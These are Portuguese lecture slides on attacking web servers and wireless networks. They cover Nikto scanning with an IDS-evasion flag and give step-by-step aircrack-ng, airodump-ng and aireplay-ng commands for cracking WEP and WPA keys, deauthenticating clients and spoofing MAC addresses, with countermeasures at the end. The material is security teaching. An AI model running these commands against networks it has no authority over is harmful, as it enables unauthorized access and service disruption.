Buscar

Slides - Aula 18

Prévia do material em texto

Ataques a Servidores WEB 
Objetivos 
Aprender como encontrar vulnerabilidades em servidores 
web 
Conhecer diferentes as diferenças entre Apache e IIS 
Descobrir como explorar as vulnerabilidades encontradas 
Tipos de ataques 
DoS 
•Jamming Networks 
•Flooding Service Ports 
•Misconfiguring Routers 
•Flooding Mail Servers 
Tipos de ataques 
DDoS 
•FTP Bounce Attacks 
•Port Scanning Attack 
•Ping Flooding Attack 
•Smurf Attack 
•SYN Flooding Attack 
•IP Fragmentation/Overlapping Fragment Attack 
•IP Sequence Prediction Attack 
•DNS Cache Poisoning 
•SNMP Attack 
•Send Mail Attack 
Fingerprint em Web Server 
Httprint 
•Ferramenta para pegar o banner de identificação do 
servidor web. 
Descobrindo Vulnerabilidades com 
Nikto 
Nikto é um script Perl usado para testar a segurança de seu servidor 
web. 
# ./nikto.pl -update 
# ./nikto.pl -h 192.168.131.1 -o /192.168.131.1.txt 
 
Podemos adicionar o sinalizador de evasão, que tenta contornar 
seus sistemas de IDS: 
# perl nikto.pl -h www.xyz.com.br -evasion 1 
 
Existem 9 opções diferentes para flags de evasão, 1 é para Random 
URL encoding (non-UTF8). 
Auditoria e Exploração de Web 
Servers com W3AF 
Essa ferramenta é um framework para auditoria e ataque em 
aplicações web. 
 
 
 
 
 
Página do projeto: http://sourceforge.net/projects/w3af/ 
Vídeos: http://w3af.sourceforge.net/videos/video-demos.php 
 
Online Scanner 
Há vária ferramentas online que podemos utilizar para fazer a 
varredura de web servers e obter informações necessárias para a 
exploração de vulnerabilidades encontradas. 
 
http://www.netcraft.com/ 
 
Contramedidas 
Realizar constantes verificações nas configurações de 
segurança dos servidores web. 
 
Atualizar constantemente os servidores. 
 
Diminuir ao máximo as informações que são transmitidas 
pelos web servers às ferramentas de fingerprinting. 
Ataques à Redes Sem Fio 
Objetivos 
Entender as técnicas para acessar as redes sem fio 
 
Uma visão sobre WEP, WPA e as técnicas de 
ataque 
 
Entender como funciona o ataque baseado em 
Rainbow Tables 
 
Introdução 
Uma rede wireless mal projetada pode driblar todo o arsenal de 
defesa já implementado. Vamos imaginar a seguinte situação: sua 
empresa colocou uma muralha (o firewall) para proteção dos 
ataques. Porém, a muralha é completamente ineficiente contra os 
ataques aéreos (wireless). 
Wardriving 
Esse ataque tira proveito de uma 
característica fundamental: é difícil 
controlar e limitar o alcance de redes 
wireless. 
 
Essa técnica tem como objetivo identificar 
as redes sem fio acessíveis de um 
determinado local. 
 
 
Ataques ao protocolo WEP 
O protocolo WEP (Wired Equivalent Privacy) aplica criptografia avançada ao sinal e 
verifica os dados com uma “chave de segurança” eletrônica. 
Porém, a Universidade de Berkeley revelou a possibilidade de alguns tipos de ataques 
que exploram falhas no algoritmo WEP. 
 
O artigo pode ser obtido na url 
http://www.isaac.cs.berkeley.edu/isaac/wep-faq.html 
 
Após a publicação do artigo, surgiram algumas ferramentas que exploravam o 
problema descrito no mesmo. Um exemplo de ferramenta é o aircrack. 
 
Quebrando WEP 
Iniciando a captura dos pacotes: 
# iwlist scan 
# airmon-ng start wlan0 
# airodump-ng --ivs -w wep -c canal_da_rede mon0 
Onde: 
-c = Canal 
-w = Prefixo do arquivo a ser salvo 
-i = Capturar apenas pacotes que contem IVs 
wlan0 = Interface wireless 
 
Agora que temos uma quantidade grande de pacotes, podemos executar o aircrack para de fato, 
descobrirmos a chave: 
#aircrack-ng -a 1 wep-01.ivs 
Onde: 
-a = Modo para forçar um determinado tipo de ataque 
1 = WEP 
wep-01.ivs = Arquivo gerado pelo airodump-ng (selecionamos o prefixo wep e apenas pacotes IVs) 
 
Agora é aguardar que o aircrack-ng nos mostrará a chave. Caso ele não consiga, tente capturar mais 
pacotes e execute novamente. 
SSID Oculto 
Os SSID ocultos podem ser facilmente detectados através de 
sniffers, uma vez que o seu nome é trafegado sem criptografia 
em uma rede. Por isso, ocultar o nome de um SSID não 
aumenta a segurança de uma rede sem fio. 
 
O próprio aircrack, utilizando o airodump, já nos mostra 
todos os SSID, incluindo os ocultos. 
 
MAC Spoof 
É relativamente simples “forjar” o endereço físico da 
sua placa de rede. Portanto, não podemos confiar 
apenas nesse controle para garantir a segurança de 
uma rede sem fio. 
 
# ifconfig wlan0 down hw ether 00:00:00:00:01:01 
 
Através de sniffer conseguimos descobrir o MAC Address de um 
cliente. 
WPA Bruteforce 
Redes com WPA ainda não possuem uma vulnerabilidade 
como o WEP, onde conseguimos descobrir a chave após 
analisar o tráfego depois de um certo período de tempo. 
 
Porém, é possível realizar brute force contra o hash da senha 
enviada durante a conexão entre um cliente válido da rede e 
tentar descobrir a senha utilizada para conexão à rede. 
 
Quebrando WPA 
# airodump-ng –c 11 –w wpa mon0 
Onde: 
-c = canal 
-w = prefixo usado no nome do arquivo que salvara os pacotes 
 
Realizando a deautenticação de um cliente: 
# aireplay-ng -0 5 –a 00:00:00:00:00:01 –c 00:00:00:00:00:02 wlan0 
Onde: 
•-0 5 = opção de deautenticação, enviando 5 requisições 
•-a MAC Address do Access Point alvo 
•-c MAC Address do cliente que vamos deautenticar 
•wlan0 = nossa interface wireless 
 
Quebrando WPA 
Quebrando a senha capturada com o airodump-ng: 
# aircrack-ng -a 2 -w wordlist.txt wpa-01.cap 
 
Onde: 
-a = Modo para forçar um determinado tipo de ataque 
2 = WPA/WPA2-PSK 
-w wordlist 
wpa-01.cap = arquivo gerado pelo airodump-ng 
WPA Rainbow Tables 
Programa para usar rainbow tables: 
./cowpatty -r [dump] -d [rainbow_table] -s [SSID] 
 
http://www.securitytube.net/Using-CowPatty-in-Backtrack-4-video.aspx 
 
Download de rainbow tables: 
http://www.security-database.com/toolswatch/WPA-Rainbow-Tables-
Offensive.html 
 
Rougue Access Point 
Rougue Access point são WLAN Access Points que não estão 
autorizados a conectar em uma rede. 
 
Um Rougue AP abre um “buraco” wireless na rede. Um hacker pode 
implantar um rougue Access point ou um funcionário pode criar um 
problema de segurança sem saber, simplesmente conectando um 
Access Point desconfigurado na rede da empresa. 
 
http://www.securitytube.net/Attacks-on-WiFi-(Rogue-Access-Point)-
video.aspx 
 
Contramedidas 
Utilizar senhas fortes nos Access point 
Não usar WEP 
Não confiar em controle de acesso via MAC 
Address 
Possuir uma política de segurança atualizada, que 
controle as redes sem fio.

Continue navegando